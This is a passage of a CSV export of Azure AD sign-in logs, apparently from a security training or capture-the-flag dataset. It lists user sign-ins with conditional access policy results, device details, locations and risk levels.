Directory,23877b62-2023-4ce4-9fb4-bf65e3b51300,SigninLogs,Failed,33.7984581,-84.38828278
+303,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:28.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0e8445f8-bf71-4f01-b868-1628a720ced2,Microsoft.aadiam,Microsoft.aadiam,,CTFUser4,4,US,Office.com,4b233688-031c-404b-9a80-a4f3f2351f90,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 20:04,"{'operatingSystem': 'MacOs', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6ab139a2-776a-491f-a231-a575cec10000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.43826293945312, 'latitude': 37.53799819946289}, 'state': 'Virginia', 'city': 'Richmond'}",none,none,none,none,[],{'errorCode': 0},CTFUser4,b3440333-37b8-45b4-ae78-bac1f82f38bf,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6ab139a2-776a-491f-a231-a575cec10000,SigninLogs,Sucess,37.5379982,-77.43826294
+304,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:59.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,44a5d594-baca-483e-98f8-b20c3833b412,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:55,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3109113e-8f92-47c2-a124-2483d23b0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,3109113e-8f92-47c2-a124-2483d23b0700,SigninLogs,Sucess,34.06555176,-118.2405396
+305,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:38.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c30e4b36-e30a-4f41-9783-2d2af298fdd6,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 23:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",028ee73f-e71d-464b-b4fd-9db252072600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,028ee73f-e71d-464b-b4fd-9db252072600,SigninLogs,Sucess,36.6404686,-78.26995087
+306,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:28.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,57f3883f-5501-4483-9343-a8198c42d5e1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8ccd2b23-7303-4913-b6ad-50874f7b1d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8ccd2b23-7303-4913-b6ad-50874f7b1d00,SigninLogs,Sucess,36.6404686,-78.26995087
+307,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:13.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0b94c998-5c08-46bf-a624-ec31a5001473,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure App Service Resource,5e1ba54d-4504-4799-9600-6d05e58f0682,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:37,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",d335f4d8-fda1-4a0a-8761-918ce8a80300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d335f4d8-fda1-4a0a-8761-918ce8a80300,SigninLogs,Sucess,38.47222137,-77.41989899
+308,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:50.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4db84031-3b63-496a-91d6-4b9e01cca26c,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:18,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",ecc2d3c2-4c88-4d4d-873f-6f53db190000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,ecc2d3c2-4c88-4d4d-873f-6f53db190000,SigninLogs,Sucess,32.32146072,34.85319901
+309,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:51.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a0b0f6e7-96cb-4afc-99b2-a9117e291e66,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:56,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",30f34fe8-f8af-4114-b479-b462fbc20100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,30f34fe8-f8af-4114-b479-b462fbc20100,SigninLogs,Sucess,32.32146072,34.85319901
+310,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:27.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 